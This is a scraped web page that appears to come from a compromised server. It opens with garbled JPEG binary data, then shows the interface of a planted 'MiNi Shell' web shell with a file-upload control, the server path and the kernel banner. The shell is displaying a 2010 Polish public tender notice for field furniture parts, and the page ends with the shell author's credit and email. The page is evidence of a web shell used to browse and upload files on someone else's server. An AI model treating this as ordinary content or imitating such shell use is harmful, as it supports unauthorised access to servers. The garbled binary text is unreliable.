JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100705/176127-N-2010.html

<p class="kh_header"><b>Bydgoszcz: Dostawa materiałów do remontu sprzętu polowego</b><br>
<b>Numer ogłoszenia: 176127 - 2010; data zamieszczenia: 05.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd  Infrastruktury , ul. Podchorążych 33, 85-915 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052/3784285.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzi.w.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów do remontu sprzętu polowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa  sprzętu kwaterunkowego o konstrukcji drewnianej wg poniższego wyszczególnienia:

1.		leżysko do łożka polowego   	380
2.		siedzisko do taboretu polowego 	1 225
3.		blat do stołu polowego	200
Zaproponowane wyroby muszą posiadać parametry takie same lub równoważne  do parametrów wskazanych w poniższych opisach oraz muszą  być wykonane zgodnie z  tymi opisami. 
Załączone szkice i zdjęcia mają charakter poglądowy, odzwierciedlający sparametryzowany przez Zamawiającego wzorzec
Na etapie składania ofert wykonawca złoży oświadczenie, że przedmiot zamówienia wykona z materiałów posiadających obowiązujące i wymaganych atesty. Atesty i certyfikaty wskazane dla poszczególnych wyrobów w opisie (załącznik nr 2 do SIWZ) wykonawca przedstawi wraz z pierwszym (wzorcowym) egzemplarzem wyrobu. 
Opis przedmiotu zamówienia 
Poz. 1 Leżysko do łóżka polowego z pokrowcem  
1.	Dane techniczno - użytkowe:
	Leżysko wraz z linką mocującą i pokrowcem wykonane wg wzoru Zamawiającego. Wzór leżyska wraz z pokrowcem do wglądu u Zamawiającego.
	Leżysko pełni  jednocześnie funkcję materaca. 
	Wykonane o wymiarach i technicznych rozwiązaniach, umożliwiających zastosowanie do stelaża łóżka polowego składanego - metalowego WP 5-2 o wymiarach;
	długość	-	2120 mm
	szerokość      	-    	770 mm
	Leżysko  wyposażone w wyłogi z metalowymi oczkami umożliwiające sznurowanie do stelaża pod spodem.
	W leżysku wykonane odpowiednie wycięcia w miejscach składania (zgięcia) stelaża w celu uniknięcia przetarcia lub przerwania. 
	Możliwość przechowywania w postaci złożonej w pokrowcu - worku polipropylenowym nie przemakalnym w kolorze ciemnym, stanowiącym  komplet.
	Możliwość czyszczenia za pomocą chemicznych środków piorących.
	Od spodu pod zagłówkiem wykonana kieszeń na drobne przedmioty osobiste zamykana zamkiem błyskawicznym.
2.Wymogi dotyczące materiałów z których należy wykonać przedmiot zamówienia:
	Zewnętrzne (wierzchnią) pokrycie leżyska należy wykonać z tkaniny poliestrowej powlekanej PCV impregnowanej - koloru khaki, odpornej na wilgoć.
	Tkanina impregnowana środkami pod kątem: wodoodporności i higieny. 
	Wewnętrzna  część leżyska wyłożona - pianką poliuretanowa o grubości 20 mm i gęstości T-25.
	Dolne pokrycie leżyska wykonane z tkaniny poliamidowej impregnowane środkiem przeciwgrzybicznym AG w kolorze czarnym.
	Wytrzymałość wątka i osnowy na zrywanie min. 230 da/N, kolor - khaki. 
	Obrzeża wykończone  z taśma polipropylenową o wytrzymałości na zrywanie min. 340 da/N w kolorze czarnym.
	Nici poliestrowe stosowane do wszywania wzmocnień o wytrzymałości na zrywanie  min. 4600 cN w kolorze ciemnym.
	Sznur-linka elastyczna O 6-8 mm w kolorze czarnym o wytrzymałości przenoszącej obciążenie  użytkowe min. 200 kg.  Końcówki sznurka - linki trwale zabezpieczone przed rozpleceniem odkuwkami ze stali nierdzewnej lub z tworzywa sztucznego. Długość linki umożliwiająca swobodną regulację napięcia leżyska.
	Oczka pod linki wykonane ze stali nierdzewnej lub innych metali odpornych na korozję umożliwiające swobodne sznurowanie.
3.Dodatkowe informacje:
	Przed realizacją zamówienia Dostawca przedstawi Zamawiającemu pierwszy egzemplarz leżyska do odbioru technicznego.
	Na leżysko wymagany jest atest higieniczny klasy E1 wydany przez uprawnioną jednostkę certyfikującą, że może być stosowane w pomieszczeniach przeznaczonych do stałego przebywania ludzi wymagany wraz z pierwszym egzemplarzem.
	Leżysko przeznaczone  jest na stały pobyt ludzi.
	Do wykonania  zastosować materiały w I gatunku. 
	Na leżysko dostawca udzieli min. 2 letnią gwarancję.
Poz. 2 Siedzisko do taboretu polowego

Siedzisko do taboretu polowego wykonane wg. wzoru Zamawiającego.
Wzór siedziska do wglądu u Zamawiającego.
Przed realizacją zamówienia Dostawca przedstawi Zamawiającemu pierwszy egzemplarz siedziska do odbioru technicznego.
Wykonane o wymiarach i technicznych rozwiązaniach, umożliwiających zastosowanie do stelaża taboretu polowego składanego z metalową podstawą WP 5-7 (z pałąkiem). 
Wyposażone w metalowe oczka umożliwiające sznurowanie do stelaża pod spodem. 
Zewnętrzne (wierzchnie) pokrycie siedziska należy wykonać z tkaniny poliestrowej powlekanej PCV impregnowanej - koloru khaki, odpornej na wilgoć. 
Dolne warstwa siedziska wykonana z tkaniny poliamidowej impregnowane środkiem przeciwgrzybicznym AG w kolorze czarnym 
Obrzeża wykończone z taśmy polipropylenowej o wytrzymałości na zrywanie min. 230 da/N w kolorze czarnym.
Do zszywania użyte nici poliestrowe o wytrzymałości na zrywanie  min. 4600 cN w kolorze ciemnym.
Sznur-linka elastyczna O 6-8 mm w kolorze czarnym o wytrzymałości przenoszącej obciążenie  użytkowe min. 200 kg.  Końcówki sznurka - linki trwale zabezpieczone przed rozpleceniem odkuwkami ze stali nierdzewnej lub z tworzywa sztucznego. Długość linki umożliwiająca swobodne sznurowanie siedziska ze stelażem.
Oczka pod linki wykonane ze stali nierdzewnej lub innych metali odpornych na korozję umożliwiające swobodne sznurowanie.
Siedzisko przeznaczone  jest na stały pobyt ludzi.
Do wykonania  zastosowane materiały w I gatunku. 
Na siedzisko wymagany jest atest higieniczny klasy E1 wydany przez uprawnioną jednostkę certyfikującą, że może być stosowane w pomieszczeniach przeznaczonych do stałego przebywania ludzi wymagany wraz z pierwszym egzemplarzem.
Na siedzisko dostawca udzieli min. 2 letnią gwarancję.
Poz. 3 Blat do stołu polowego 
Wykonany wg przedstawionego rysunku  oraz szczegółowego opisu.
Blat przeznaczony do polowego stołu kwadratowego składanego z metalową podstawą WP 5-8 o wym. 800x 800 z narożnikami zaokrąglonymi.
Blat wykonany w kolorze ciemnym - brąz.
Wykonany  z płyty HPL lub bakelitowo - papierowej o grubości 6 mm. 
Impregnowany żywicami fenolowymi i melaminowymi, a strona dekoracyjna chroniona od wpływów promieni UV światła słonecznego  specjalną folią. 
Powierzchnia gładka, łatwa do utrzymania w czystości, odporna na ścieranie, zaplamienia, wrzątek, gorące dno garnka, zabrudzenia i tłuszcze.
Płyta musi spełniać warunki do zastosowania na zewnątrz, odporna na uderzenia, o dużej wytrzymałość mechanicznej na zginanie i rozerwanie, samonośna, niewrażliwa na wysoką temperaturę i mróz, nie korodująca, odporna na wodę i parę wodną.
Przed realizacją zamówienia Wykonawca przedstawi Zamawiającemu pierwszy egzemplarz blatu do odbioru technicznego.
Na zastosowaną płytę wymagany jest atest higieniczny klasy E1 wydany przez uprawnioną jednostkę certyfikującą, że może być stosowana w pomieszczeniach przeznaczonych do stałego przebywania ludzi wymagany wraz z pierwszym egzemplarzem. 
Blat wykonany z materiałów w I gatunku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.52.25.20-8, 39.11.30.00-7, 39.14.12.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Ustala się wadium na całość zamówienia w  wysokości 3.000zł
2.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert,           w jednej lub kilku formach przewidzianych w art. 45 ust.6 ustawy prawo zamówień publicznych.
3.	Wadium w postaci poręczeń bankowych, poręczeń SKOK, gwarancji bankowych, gwarancji ubezpieczeniowych oraz poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt.2 (Dz. U. Nr 109poz. 1158) lit.b ustawy z dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości można wnieść w oryginale jako odrębny załącznik do oferty, umożliwiający łatwe oddzielenie od pozostałych dokumentów ofertowych lub do kasy w siedzibie Zamawiającego  pok. 105 lub.
      Kasa czynna jest w dni powszednie w godz. 12.00 do 14.00

4.	Wadium w postaci pieniądza należy wnieść dokonując wpłaty (przelewu) na konto  Zamawiającego : 
     NBP ODDZIAŁ OKRĘGOWY BYDGOSZCZ  63 1010 1078 0015 2813 9120 0000
Za termin skuteczny wniesienia wadium uznaje się termin wpłynięcia pieniędzy na rachunek Zamawiającego. 
Wniesienie wadium w postaci pieniądza należy dokonać z takim wyprzedzeniem, żeby wpłynęły na rachunek  Zamawiającego w wymaganym terminie.

     UWAGA!  Zamawiający nie wyraża zgody na przyjmowanie do kasy wadium w postaci pieniądza. 

5.	W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej Zamawiający wymaga, aby wystawiona gwarancja była bezwarunkowa, nieodwołalna i płatna na pierwsze żądanie Zamawiającego.
       Ponadto koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za  wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i 5 ustawy. 
6.	Nie wniesienie wadium, wniesienie wadium po terminie lub w innej postaci niż wskazane w art. 24 ust.6 ustawy będzie przyczyną  wykluczenia wykonawcy. Termin ważności wadium nie może być  krótszy od terminu związania ofertą
7.	Zamawiający zatrzyma wadium wniesione w postępowaniu, w sytuacji zaistnienia przesłanek art. 46 ust. 4a i 5 ustawy pzp tj, jeżeli wykonawca:
- na wezwanie, o którym mowa w art. 26 ust. 3 ustawy nie złożył dokumentów, pełnomocnictw lub oświadczeń, chyba ze udowodni, ze  wynika to z przyczyn nie leżących po jego stronie,
    - którego oferta została wybrana odmawia podpisania umowy na warunkach określonych w ofercie, nie wniósł zabezpieczenia należytego wykonania umowy lub zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
  8. Zamawiający dokona zwrotu wadium zgodnie z unormowaniem art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Warunek oceniony zostanie na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Warunek oceniony zostanie na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Warunek oceniony zostanie na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Warunek oceniony zostanie na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Warunek oceniony zostanie na podstawie złożonego oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rzi.hg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Podchorążych 33, 85-915 Bydgoszcz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2010 godzina 10:00, miejsce: siedziba Zamawiającego pok. 2 Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com